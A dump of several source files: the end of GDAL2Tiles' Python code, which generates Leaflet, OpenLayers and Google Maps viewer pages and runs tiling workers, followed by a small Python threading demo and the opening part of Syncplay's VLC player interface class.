((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false} // create the background graphic as a <div> containing an image var container = document.createElement("div"); container.style.width="70px"; container.style.height="21px"; // Handle transparent PNG files in MSIE if (this.ie) { var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');"; container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>'; } else { container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>'; } // create the knob as a GDraggableObject // Handle transparent PNG files in MSIE if (this.ie) { var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');"; this.knob = document.createElement("div"); this.knob.style.height="21px"; this.knob.style.width="13px"; this.knob.style.overflow="hidden"; this.knob_img = document.createElement("div"); this.knob_img.style.height="21px"; this.knob_img.style.width="83px"; this.knob_img.style.filter=loader; this.knob_img.style.position="relative"; this.knob_img.style.left="-70px"; this.knob.appendChild(this.knob_img); } else { this.knob = document.createElement("div"); this.knob.style.height="21px"; this.knob.style.width="13px"; this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)"; this.knob.style.backgroundPosition="-70px 0px"; } container.appendChild(this.knob); this.slide=new GDraggableObject(this.knob, {container:container}); this.slide.setDraggableCursor('pointer'); this.slide.setDraggingCursor('pointer'); this.container = container; // attach the control to the map map.getContainer().appendChild(container); // init slider this.setSlider(this.opacity); // Listen for the slider being moved and set the opacity GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()}); //GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) }); return container; } // Set the default position for the control CTransparencyControl.prototype.getDefaultPosition = function() { return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47)); } /* * Full-screen Window Resize */ function getWindowHeight() { if (self.innerHeight) return self.innerHeight; if (document.documentElement && document.documentElement.clientHeight) return document.documentElement.clientHeight; if (document.body) return document.body.clientHeight; return 0; } function getWindowWidth() { if (self.innerWidth) return self.innerWidth; if (document.documentElement && document.documentElement.clientWidth) return document.documentElement.clientWidth; if (document.body) return document.body.clientWidth; return 0; } function resize() { var map = document.getElementById("map"); var header = document.getElementById("header"); var subheader = document.getElementById("subheader"); map.style.height = (getWindowHeight()-80) + "px"; map.style.width = (getWindowWidth()-20) + "px"; header.style.width = (getWindowWidth()-20) + "px"; subheader.style.width = (getWindowWidth()-20) + "px"; // map.checkResize(); } /* * Main load function: */ function load() { if (GBrowserIsCompatible()) { // Bug in the Google Maps: Copyright for Overlay is not correctly displayed var gcr = GMapType.prototype.getCopyrights; GMapType.prototype.getCopyrights = function(bounds,zoom) { return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom)); } map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } ); map.addMapType(G_PHYSICAL_MAP); map.setMapType(G_PHYSICAL_MAP); map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds )); hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] ); GEvent.addListener(map, "maptypechanged", function() { if (map.getCurrentMapType() == G_HYBRID_MAP) { map.addOverlay(hybridOverlay); } else { map.removeOverlay(hybridOverlay); } } ); var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom); var mercator = new GMercatorProjection(mapMaxZoom+1); tilelayer.getTileUrl = function(tile,zoom) { if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) { return "http://www.maptiler.org/img/none.png"; } var ymax = 1 << zoom; var y = ymax - tile.y -1; var tileBounds = new GLatLngBounds( mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ), mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom ) ); if (mapBounds.intersects(tileBounds)) { return zoom+"/"+tile.x+"/"+y+".png"; } else { return "http://www.maptiler.org/img/none.png"; } } // IE 7-: support for PNG alpha channel // Unfortunately, the opacity for whole overlay is then not changeable, either or... tilelayer.isPng = function() { return true;}; tilelayer.getOpacity = function() { return opacity; } overlay = new GTileLayerOverlay( tilelayer ); map.addOverlay(overlay); map.addControl(new GLargeMapControl()); map.addControl(new GHierarchicalMapTypeControl()); map.addControl(new CTransparencyControl( overlay )); """ % args # noqa if self.kml: s += """ map.addMapType(G_SATELLITE_3D_MAP); map.getEarthInstance(getEarthInstanceCB); """ s += """ map.enableContinuousZoom(); map.enableScrollWheelZoom(); map.setMapType(G_HYBRID_MAP); } resize(); } """ if self.kml: s += """ function getEarthInstanceCB(object) { var ge = object; if (ge) { var url = document.location.toString(); url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml'; var link = ge.createLink(""); if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") } else { link.setHref(url) }; var networkLink = ge.createNetworkLink(""); networkLink.setName("TMS Map Overlay"); networkLink.setFlyToView(true); networkLink.setLink(link); ge.getFeatures().appendChild(networkLink); } else { // alert("You should open a KML in Google Earth"); // add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML? } } """ % args # noqa s += """ onresize=function(){ resize(); }; //]]> </script> </head> <body onload="load()"> <div id="header"><h1>%(title)s</h1></div> <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a> <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU --> </div> <div id="map"></div> </body> </html> """ % args # noqa return s def generate_leaflet(self): """ Template for leaflet.html implementing overlay of tiles for 'mercator' profile. It returns filled string. Expected variables: title, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl """ args = {} args['title'] = self.options.title.replace('"', '\\"') args['htmltitle'] = self.options.title args['south'], args['west'], args['north'], args['east'] = self.swne args['centerlon'] = (args['north'] + args['south']) / 2. args['centerlat'] = (args['west'] + args['east']) / 2. args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['beginzoom'] = self.tmaxz args['tilesize'] = self.tilesize # not used args['tileformat'] = self.tileext args['publishurl'] = self.options.url # not used args['copyright'] = self.options.copyright.replace('"', '\\"') s = """<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' /> <title>%(htmltitle)s</title> <!-- Leaflet --> <link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" /> <script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script> <style> body { margin:0; padding:0; } body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; } #map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */ .ctl { padding: 2px 10px 2px 10px; background: white; background: rgba(255,255,255,0.9); box-shadow: 0 0 15px rgba(0,0,0,0.2); border-radius: 5px; text-align: right; } .title { font-size: 18pt; font-weight: bold; } .src { font-size: 10pt; } </style> </head> <body> <div id="map"></div> <script> /* **** Leaflet **** */ // Base layers // .. OpenStreetMap var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://osm.org/copyright">OpenStreetMap</a> contributors'}); // .. CartoDB Positron var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '&copy; <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, &copy; <a href="http://cartodb.com/attributions">CartoDB</a>'}); // .. OSM Toner var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.'}); // .. White background var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg=="); // Overlay layers (TMS) var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s"}); // Map var map = L.map('map', { center: [%(centerlon)s, %(centerlat)s], zoom: %(beginzoom)s, minZoom: %(minzoom)s, maxZoom: %(maxzoom)s, layers: [osm] }); var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white} var overlaymaps = {"Layer": lyr} // Title var title = L.control(); title.onAdd = function(map) { this._div = L.DomUtil.create('div', 'ctl title'); this.update(); return this._div; }; title.update = function(props) { this._div.innerHTML = "%(title)s"; }; title.addTo(map); // Note var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>'; var title = L.control({position: 'bottomleft'}); title.onAdd = function(map) { this._div = L.DomUtil.create('div', 'ctl src'); this.update(); return this._div; }; title.update = function(props) { this._div.innerHTML = src; }; title.addTo(map); // Add base layers L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map); // Fit to overlay bounds (SW and NE points with (lat, lon)) map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]); </script> </body> </html> """ % args # noqa return s def generate_openlayers(self): """ Template for openlayers.html implementing overlay of available Spherical Mercator layers. It returns filled string. Expected variables: title, bingkey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl """ args = {} args['title'] = self.options.title args['bingkey'] = self.options.bingkey args['south'], args['west'], args['north'], args['east'] = self.swne args['minzoom'] = self.tminz args['maxzoom'] = self.tmaxz args['tilesize'] = self.tilesize args['tileformat'] = self.tileext args['publishurl'] = self.options.url args['copyright'] = self.options.copyright if self.options.tmscompatible: args['tmsoffset'] = "-1" else: args['tmsoffset'] = "" if self.options.profile == 'raster': args['rasterzoomlevels'] = self.tmaxz + 1 args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1] s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" <head> <title>%(title)s</title> <meta http-equiv='imagetoolbar' content='no'/> <style type="text/css"> v\:* {behavior:url(#default#VML);} html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; } body { margin: 10px; background: #fff; } h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; } #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; } #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;} #map { height: 95%%; border: 1px solid #888; } .olImageLoadError { display: none; } .olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; } </style>""" % args # noqa if self.options.profile == 'mercator': s += """ <script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script> """ % args s += """ <script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script> <script> var map; var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s); var mapMinZoom = %(minzoom)s; var mapMaxZoom = %(maxzoom)s; var emptyTileURL = "http://www.maptiler.org/img/none.png"; OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3; function init(){""" % args if self.options.profile == 'mercator': s += """ var options = { div: "map", controls: [], projection: "EPSG:3857", displayProjection: new OpenLayers.Projection("EPSG:4326"), numZoomLevels: 20 }; map = new OpenLayers.Map(options); // Create Google Mercator layers var gmap = new OpenLayers.Layer.Google("Google Streets", { type: google.maps.MapTypeId.ROADMAP, sphericalMercator: true }); var gsat = new OpenLayers.Layer.Google("Google Satellite", { type: google.maps.MapTypeId.SATELLITE, sphericalMercator: true }); var ghyb = new OpenLayers.Layer.Google("Google Hybrid", { type: google.maps.MapTypeId.HYBRID, sphericalMercator: true }); var gter = new OpenLayers.Layer.Google("Google Terrain", { type: google.maps.MapTypeId.TERRAIN, sphericalMercator: true }); // Create Bing layers var broad = new OpenLayers.Layer.Bing({ name: "Bing Roads", key: "%(bingkey)s", type: "Road", sphericalMercator: true }); var baer = new OpenLayers.Layer.Bing({ name: "Bing Aerial", key: "%(bingkey)s", type: "Aerial", sphericalMercator: true }); var bhyb = new OpenLayers.Layer.Bing({ name: "Bing Hybrid", key: "%(bingkey)s", type: "AerialWithLabels", sphericalMercator: true }); // Create OSM layer var osm = new OpenLayers.Layer.OSM("OpenStreetMap"); // create TMS Overlay layer var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', isBaseLayer: false, getURL: getURL }); if (OpenLayers.Util.alphaHack() == false) { tmsoverlay.setOpacity(0.7); } map.addLayers([gmap, gsat, ghyb, gter, broad, baer, bhyb, osm, tmsoverlay]); var switcherControl = new OpenLayers.Control.LayerSwitcher(); map.addControl(switcherControl); switcherControl.maximizeControl(); map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection)); """ % args # noqa elif self.options.profile == 'geodetic': s += """ var options = { div: "map", controls: [], projection: "EPSG:4326" }; map = new OpenLayers.Map(options); var wms = new OpenLayers.Layer.WMS("VMap0", "http://tilecache.osgeo.org/wms-c/Basic.py?", { layers: 'basic', format: 'image/png' } ); var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', isBaseLayer: false, getURL: getURL }); if (OpenLayers.Util.alphaHack() == false) { tmsoverlay.setOpacity(0.7); } map.addLayers([wms,tmsoverlay]); var switcherControl = new OpenLayers.Control.LayerSwitcher(); map.addControl(switcherControl); switcherControl.maximizeControl(); map.zoomToExtent(mapBounds); """ % args # noqa elif self.options.profile == 'raster': s += """ var options = { div: "map", controls: [], maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s), maxResolution: %(rastermaxresolution)f, numZoomLevels: %(rasterzoomlevels)d }; map = new OpenLayers.Map(options); var layer = new OpenLayers.Layer.TMS("TMS Layer", "", { serviceVersion: '.', layername: '.', alpha: true, type: '%(tileformat)s', getURL: getURL }); map.addLayer(layer); map.zoomToExtent(mapBounds); """ % args # noqa s += """ map.addControls([new OpenLayers.Control.PanZoomBar(), new OpenLayers.Control.Navigation(), new OpenLayers.Control.MousePosition(), new OpenLayers.Control.ArgParser(), new OpenLayers.Control.Attribution()]); } """ % args if self.options.profile == 'mercator': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom(); if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') { z+=1; } var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa elif self.options.profile == 'geodetic': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom()%(tmsoffset)s; var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa elif self.options.profile == 'raster': s += """ function getURL(bounds) { bounds = this.adjustBounds(bounds); var res = this.getServerResolution(); var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w)); var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h)); var z = this.getServerZoom(); var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type; var url = this.url; if (OpenLayers.Util.isArray(url)) { url = this.selectUrl(path, url); } if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) { return url + path; } else { return emptyTileURL; } } """ % args # noqa s += """ function getWindowHeight() { if (self.innerHeight) return self.innerHeight; if (document.documentElement && document.documentElement.clientHeight) return document.documentElement.clientHeight; if (document.body) return document.body.clientHeight; return 0; } function getWindowWidth() { if (self.innerWidth) return self.innerWidth; if (document.documentElement && document.documentElement.clientWidth) return document.documentElement.clientWidth; if (document.body) return document.body.clientWidth; return 0; } function resize() { var map = document.getElementById("map"); var header = document.getElementById("header"); var subheader = document.getElementById("subheader"); map.style.height = (getWindowHeight()-80) + "px"; map.style.width = (getWindowWidth()-20) + "px"; header.style.width = (getWindowWidth()-20) + "px"; subheader.style.width = (getWindowWidth()-20) + "px"; if (map.updateSize) { map.updateSize(); }; } onresize=function(){ resize(); }; </script> </head> <body onload="init()"> <div id="header"><h1>%(title)s</h1></div> <div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a> <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU --> </div> <div id="map"></div> <script type="text/javascript" >resize()</script> </body> </html>""" % args # noqa return s def worker_tile_details(input_file, output_folder, options, send_pipe=None): try: gdal2tiles = GDAL2Tiles(input_file, output_folder, options) gdal2tiles.open_input() gdal2tiles.generate_metadata() tile_job_info, tile_details = gdal2tiles.generate_base_tiles() return_data = (tile_job_info, tile_details) if send_pipe: send_pipe.send(return_data) return return_data except Exception as e: print("worker_tile_details failed ", str(e)) def progress_printer_thread(queue, nb_jobs): pb = ProgressBar(nb_jobs) pb.start() for _ in range(nb_jobs): queue.get() pb.log_progress() queue.task_done() class ProgressBar(object): def __init__(self, total_items): self.total_items = total_items self.nb_items_done = 0 self.current_progress = 0 self.STEP = 2.5 def start(self): sys.stdout.write("0") def log_progress(self, nb_items=1): self.nb_items_done += nb_items progress = float(self.nb_items_done) / self.total_items * 100 if progress >= self.current_progress + self.STEP: done = False while not done: if self.current_progress + self.STEP <= progress: self.current_progress += self.STEP if self.current_progress % 10 == 0: sys.stdout.write(str(int(self.current_progress))) if self.current_progress == 100: sys.stdout.write("\n") else: sys.stdout.write(".") else: done = True sys.stdout.flush() def get_tile_swne(tile_job_info, options): if options.profile == 'mercator': mercator = GlobalMercator() tile_swne = mercator.TileLatLonBounds elif options.profile == 'geodetic': geodetic = GlobalGeodetic(options.tmscompatible) tile_swne = geodetic.TileLatLonBounds elif options.profile == 'raster': srs4326 = osr.SpatialReference() srs4326.ImportFromEPSG(4326) if tile_job_info.kml and tile_job_info.in_srs_wkt: in_srs = osr.SpatialReference() in_srs.ImportFromWkt(tile_job_info.in_srs_wkt) ct = osr.CoordinateTransformation(in_srs, srs4326) def rastertileswne(x, y, z): pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1]) west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tilesize * pixelsizex east = west + tile_job_info.tilesize * pixelsizex south = tile_job_info.ominy + y * tile_job_info.tilesize * pixelsizex north = south + tile_job_info.tilesize * pixelsizex if not tile_job_info.is_epsg_4326: # Transformation to EPSG:4326 (WGS84 datum) west, south = ct.TransformPoint(west, south)[:2] east, north = ct.TransformPoint(east, north)[:2] return south, west, north, east tile_swne = rastertileswne else: tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa else: tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa return tile_swne def single_threaded_tiling(input_file, output_folder, options): """ Keep a single threaded version that stays clear of multiprocessing, for platforms that would not support it """ if options.verbose: print("Begin tiles details calc") conf, tile_details = worker_tile_details(input_file, output_folder, options) if options.verbose: print("Tiles details calc complete.") if not options.verbose and not options.quiet: progress_bar = ProgressBar(len(tile_details)) progress_bar.start() for tile_detail in tile_details: create_base_tile(conf, tile_detail) if not options.verbose and not options.quiet: progress_bar.log_progress() create_overview_tiles(conf, output_folder, options) shutil.rmtree(os.path.dirname(conf.src_file)) def multi_threaded_tiling(input_file, output_folder, options): nb_processes = options.nb_processes or 1 (conf_receiver, conf_sender) = Pipe(False) if options.verbose: print("Begin tiles details calc") p = Process(target=worker_tile_details, args=[input_file, output_folder, options], kwargs={"send_pipe": conf_sender}) p.start() # Make sure to consume the queue before joining. If the payload is too big, it won't be put in # one go in the queue and therefore the sending process will never finish, waiting for space in # the queue to send data conf, tile_details = conf_receiver.recv() p.join() if options.verbose: print("Tiles details calc complete.") # Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy, # otherwise you can't pass it as a param in the method invoked by the pool... manager = Manager() queue = manager.Queue() pool = Pool(processes=nb_processes) # TODO: gbataille - check the confs for which each element is an array... one useless level? # TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..." # TODO: gbataille - check memory footprint and time on big image. are they opened x times for tile_detail in tile_details: pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue}) if not options.verbose and not options.quiet: p = Process(target=progress_printer_thread, args=[queue, len(tile_details)]) p.start() pool.close() pool.join() # Jobs finished if not options.verbose and not options.quiet: p.join() # Traces done create_overview_tiles(conf, output_folder, options) shutil.rmtree(os.path.dirname(conf.src_file)) def main(): # TODO: gbataille - use mkdtemp to work in a temp directory # TODO: gbataille - debug intermediate tiles.vrt not produced anymore? # TODO: gbataille - Refactor generate overview tiles to not depend on self variables argv = gdal.GeneralCmdLineProcessor(sys.argv) input_file, output_folder, options = process_args(argv[1:]) nb_processes = options.nb_processes or 1 if nb_processes == 1: single_threaded_tiling(input_file, output_folder, options) else: multi_threaded_tiling(input_file, output_folder, options) if __name__ == '__main__': main() # vim: set tabstop=4 shiftwidth=4 expandtab:
multi_threading_variable_share.py
import threading import time g_num = 0 def work1(num): global g_num for i in range(num): if mutex.acquire(True): g_num += 1 mutex.release() print('---in work1,g_num in %d---' % g_num) def work2(num): global g_num for i in range(num): if mutex.acquire(True): g_num += 1 mutex.release() print('---in work2,g_num in %d---' % g_num) print('---线程创建之前g_num: %d' % g_num) mutex = threading.Lock() t1 = threading.Thread(target=work1, args=(1000000,)) t2 = threading.Thread(target=work2, args=(1000000,)) t1.start() time.sleep(1) t2.start() while len(threading.enumerate()) != 1: time.sleep(1) print('2个线程对同一个变量操作之后的最终结果:%d' % g_num)
vlc.py
import asynchat import asyncore import os import random import re import socket import subprocess import sys import threading import time import urllib.error import urllib.parse import urllib.request from syncplay import constants, utils from syncplay.messages import getMessage from syncplay.players.basePlayer import BasePlayer from syncplay.utils import isBSD, isLinux, isWindows, isMacOS class VlcPlayer(BasePlayer): speedSupported = True customOpenDialog = False chatOSDSupported = False alertOSDSupported = True osdMessageSeparator = "; " RE_ANSWER = re.compile(constants.VLC_ANSWER_REGEX) SLAVE_ARGS = constants.VLC_SLAVE_ARGS if isMacOS(): SLAVE_ARGS.extend(constants.VLC_SLAVE_MACOS_ARGS) else: SLAVE_ARGS.extend(constants.VLC_SLAVE_NONMACOS_ARGS) vlcport = random.randrange(constants.VLC_MIN_PORT, constants.VLC_MAX_PORT) if (constants.VLC_MIN_PORT < constants.VLC_MAX_PORT) else constants.VLC_MIN_PORT def __init__(self, client, playerPath, filePath, args): from twisted.internet import reactor self.reactor = reactor self._client = client self._paused = None self._duration = None self._filename = None self._filepath = None self._filechanged = False self._lastVLCPositionUpdate = None self.shownVLCLatencyError = False self._previousPreviousPosition = -2 self._previousPosition = -1 self._position = 0 try: # Hack to fix locale issue without importing locale library self.radixChar = "{:n}".format(1.5)[1:2] if self.radixChar == "" or self.radixChar == "1" or self.radixChar == "5": raise ValueError except: self._client.ui.showErrorMessage( "Failed to determine locale. As a fallback Syncplay is using the following radix character: \".\".") self.radixChar = "." self._durationAsk = threading.Event() self._filenameAsk = threading.Event() self._pathAsk = threading.Event() self._positionAsk = threading.Event() self._pausedAsk = threading.Event() self._vlcready = threading.Event() self._vlcclosed = threading.Event() self._listener = None try: self._listener = self.__Listener(self, playerPath, filePath, args, self._vlcready, self._vlcclosed) except ValueError: self._client.ui.showErrorMessage(getMessage("vlc-failed-connection"), True) self.reactor.callFromThread(self._client.stop, True,) return try: self._listener.setDaemon(True) self._listener.start() if not self._vlcready.wait(constants.VLC_OPEN_MAX_WAIT_TIME): self._vlcready.set() self._client.ui.showErrorMessage(getMessage("vlc-failed-connection"), True) self.reactor.callFromThread(self._client.stop, True,) self.reactor.callFromThread(self._client.initPlayer, self,) except: pass def _fileUpdateClearEvents(self): self._durationAsk.clear() self._filenameAsk.clear() self._pathAsk.clear() def _fileUpdateWaitEvents(self): self._durationAsk.wait() self._filenameAsk.wait() self._pathAsk.wait() def _onFileUpdate(self): self._fileUpdateClearEvents() self._getFileInfo() self._fileUpdateWaitEvents() args = (self._filename, self._duration, self._filepath) self.reactor.callFromThread(self._client.updateFile, *args) self.setPaused(self._client.getGlobalPaused()) self.setPosition(self._client.getGlobalPosition()) def askForStatus(self): self._filechanged = False self._positionAsk.clear() self._pausedAsk.clear() self._listener.sendLine(".") if self._filename and not self._filechanged: self._positionAsk.wait(constants.PLAYER_ASK_DELAY) self._client.updatePlayerStatus(self._paused, self.getCalculatedPosition()) else: self._client.updatePlayerStatus(self._client.getGlobalPaused(), self._client.getGlobalPosition()) def getCalculatedPosition(self): if self._lastVLCPositionUpdate is None: return self._client.getGlobalPosition() diff = time.time() - self._lastVLCPositionUpdate if diff > constants.PLAYER_ASK_DELAY and not self._paused: self._client.ui.showDebugMessage("VLC did not response in time, so assuming position is {} ({}+{})".format( self._position + diff, self._position, diff)) if diff > constants.VLC_LATENCY_ERROR_THRESHOLD: if not self.shownVLCLatencyError or constants.DEBUG_MODE: self._client.ui.showErrorMessage(getMessage("media-player-latency-warning").format(int(diff))) self.shownVLCLatencyError = True return self._position + diff else: return self._position def displayMessage( self, message, duration=constants.OSD_DURATION * 1000, OSDType=constants.OSD_DURATION, mood=constants.MESSAGE_NEUTRAL ): duration /= 1000 if OSDType != constants.OSD_ALERT: self._listener.sendLine('display-osd: {}, {}, {}'.format('top-right', duration, message)) else: self._listener.sendLine('display-secondary-osd: {}, {}, {}'.format('center', duration, message)) def setSpeed(self, value): self._listener.sendLine("set-rate: {:.2n}".format(value)) def setFeatures(self, featureList): pass def setPosition(self, value): self._lastVLCPositionUpdate = time.time() self._listener.sendLine("set-position: {}".format(value).replace(".", self.radixChar)) def setPaused(self, value): self._paused = value if not value: self._lastVLCPositionUpdate = time.time() self._listener.sendLine('set-playstate: {}'.format("paused" if value else "playing")) def getMRL(self, fileURL): if utils.isURL(fileURL): fileURL = urllib.parse.quote(fileURL, safe="%/:=&?~#+!$,;'@()*") return fileURL fileURL = fileURL.replace('\\', '/') fileURL = fileURL.encode('utf8') fileURL = urllib.parse.quote_plus(fileURL) if isWindows(): fileURL = "file:///" + fileURL else: fileURL = "file://" + fileURL fileURL = fileURL.replace("+", "%20") return fileURL def openFile(self, filePath, resetPosition=False): if not utils.isURL(filePath): normedPath = os.path.normpath(filePath) if os.path.isfile(normedPath): filePath = normedPath if utils.isASCII(filePath) and not utils.isURL(filePath): self._listener.sendLine('load-file: {}'.format(filePath)) else: fileURL = self.getMRL(filePath) self._listener.sendLine('load-file: {}'.format(fileURL)) def _getFileInfo(self): self._listener.sendLine("get-duration") self._listener.sendLine("get-filepath") self._listener.sendLine("get-filename") def lineReceived(self, line): # try: line = line.decode('utf-8') self._client.ui.showDebugMessage("player << {}".format(line)) # except: # pass match, name, value = self.RE_ANSWER.match(line), "", "" if match: name, value = match.group('command'), match.group('argument') if line == "filepath-change-notification": self._filechanged = True t = threading.Thread(target=self._onFileUpdate) t.setDaemon(True) t.start() elif name == "filepath": self._filechanged = True if value == "no-input": self._filepath = None else: if "file://" in value: value = value.replace("file://", "") if not os.path.isfile(value): value = value.lstrip("/") elif utils.isURL(value): value = urllib.parse.unquote(value) # value = value.decode('utf-8') self._filepath = value self._pathAsk.set() elif name == "duration": if value == "no-input": self._duration = 0 elif value == "invalid-32-bit-value": self._duration = 0 self.drop(getMessage("vlc-failed-versioncheck")) else: self._duration = float(value.replace(",", ".")) self._durationAsk.set() elif name == "playstate": self._paused = bool(value != 'playing') if (value != "no-input" and self._filechanged == False) else self._client.getGlobalPaused() diff = time.time() - self._lastVLCPositionUpdate if self._lastVLCPositionUpdate else 0 if ( self._paused == False and self._position == self._previousPreviousPosition and 